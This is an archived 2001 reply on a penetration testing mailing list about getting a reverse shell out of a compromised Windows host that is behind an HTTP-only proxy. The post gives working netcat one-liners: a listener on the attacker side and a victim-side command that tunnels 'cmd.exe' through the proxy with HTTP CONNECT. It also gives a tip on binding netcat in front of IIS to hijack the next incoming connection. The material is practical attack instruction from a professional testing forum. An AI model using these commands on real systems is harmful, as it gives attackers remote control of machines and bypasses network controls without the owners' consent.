Penetration Testing mailing list archives

Re: Reverse Http Shell Solution

From: "Jody Melbourne" <jody.melbourne () itacsecurity com>
Date: Fri, 19 Oct 2001 12:30:36 +1000

Hi,

Does anybody know any solution based on the remote shell in Win32
machines using Reverse Telnet thru Proxies?
The proxy only permits HTTP 80/8080.


I think your situation is this: You have owned a machine which is behind a
firewall, and it only allows connections out via a proxy, so simple reverse
telnet techniques such as 'nc.exe -e cmd.exe myip myport' fail.

You could try something like this:

Attacker: netcat -v -l -p 80

Victim: echo CONNECT attacker:80 HTTP/1.1 | netcat proxyserver 8080 -e
cmd.exe

The HTTP/1.1 CONNECT method is the only way I can see you getting a nice
interactive command prompt if ports 80/8080 outbound are all you have to
play with. Remember that netcat can bind in FRONT of the existing IIS
process. If you spawn as netcat listener on 80, 443, 21, etc.. with the '-l'
(listen once) option, the next person to connect to that port will get the
netcat listener. Any subsequent connections will see the IIS service.

cheers

.jm







----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Current thread:

Reverse Http Shell Solution Vinicius Dalesandro (Oct 18)
- Re: Reverse Http Shell Solution Jody Melbourne (Oct 19)
- <Possible follow-ups>
- Fwd: Reverse Http Shell Solution GrandmastrPlague (Oct 18)
- RE: Reverse Http Shell Solution Frank Knobbe (Oct 18)
- RE: Reverse Http Shell Solution David Sexton (Oct 19)